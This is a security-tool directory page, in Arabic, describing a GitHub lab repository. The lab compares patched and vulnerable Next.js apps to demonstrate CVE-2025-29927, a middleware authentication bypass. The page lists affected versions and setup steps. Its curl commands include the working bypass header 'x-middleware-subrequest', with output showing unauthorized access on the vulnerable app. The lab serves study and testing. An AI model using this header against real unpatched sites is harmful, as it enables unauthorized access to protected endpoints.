Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
nextjs-cve-2025-29927 — vulnerable-nextjs-14-CVE-2025-29927 | Kitploit
أدوات/GitHubGitHub/yeondg/nextjs-cve-2025-29927
المصادقة والترخيصتحليل الثغرات الأمنيةاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليممختبرات وتدريب عملي
GitHubyeondg/nextjs-cve-2025-29927

nextjs-cve-2025-29927

vulnerable-nextjs-14-CVE-2025-29927

عرض المستودع
3منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

ثغرة Middleware في Next.js CVE-2025-29927

هذا المستودع هو مشروع monorepo يتيح لك مقارنة ثغرة CVE-2025-29927 في البرمجيات الوسيطة (Middleware) باستخدام إصدار Next.js 15.2.3 وإصدار Next.js 15.1.7.

وصف الثغرة

CVE-2025-29927 هي ثغرة أمنية اكتُشفت في البرمجيات الوسيطة (Middleware) في Next.js، وتتمثل في إمكانية تجاوز برمجية المصادقة الوسيطة باستخدام الترويسة x-middleware-subrequest. تؤثر هذه الثغرة على الإصدارات التالية:

  • Next.js 15.x < 15.2.3
  • Next.js 14.x < 14.2.25
  • Next.js 13.x < 13.5.9

وقد تم إصلاح هذه الإصدارات بتحديثها إلى إصدارات التصحيح المقابلة لها على التوالي.

طريقة التشغيل

  1. استنسخ المستودع.
  2. ثبّت التبعيات: pnpm install
  3. شغّل خادم التطوير: pnpm dev
  4. الوصول إلى كل تطبيق
  • الإصدار المُصحَّح (15.2.3): http://localhost:3000
  • الإصدار المُصاب بالثغرة (15.1.7): http://localhost:3001
  1. عند محاولة الوصول إلى نقطة النهاية /api/protected بدون رمز مميز (token)، سيتم رفض الوصول.
root@kitploit:~
$ curl http://localhost:3000/api/protected
// {"error":"Unauthorized"}

$ curl http://localhost:3001/api/protected
// {"error":"Unauthorized"}
  1. عند توفير رمز مميز صالح، يمكنك الوصول بنجاح إلى نقطة النهاية المحمية.
root@kitploit:~
$ curl -H "Authorization: my-jwt-token-here" http://localhost:3000/api/protected
// {"message":"Hello World"}

$ curl -H "Authorization: my-jwt-token-here" http://localhost:3001/api/protected
// {"message":"Hello World"}
  1. تجاوز البرمجية الوسيطة باستغلال الثغرة.
root@kitploit:~
curl -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" http://localhost:3000/api/protected
// {"error":"Unauthorized"}

curl -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" http://localhost:3001/api/protected
// {"message":"Hello World"}

هيكل المشروع

root@kitploit:~
nextjs-cve-2025-29927/
├── apps/
│   ├── next15_1_7/  # 취약한 버전
│   └── next15_2_3/  # 패치된 버전
├── packages/
│   └── ui/          # 공유 UI 컴포넌트
└── README.md

روابط مرجعية

  • مدونة Vercel
  • قناة DevStefanCho على يوتيوب
  • https://hackyboiz.github.io/2025/03/27/bekim/2025-03-27/
  • https://zhero-web-sec.github.io/research-and-things/nextjs-and-the-corrupt-middleware
  • https://github.com/vercel/next.js/security/advisories/GHSA-f82v-jwr5-mffw
  • https://github.com/lirantal/vulnerable-nextjs-14-CVE-2025-29927
تنزيل الأداة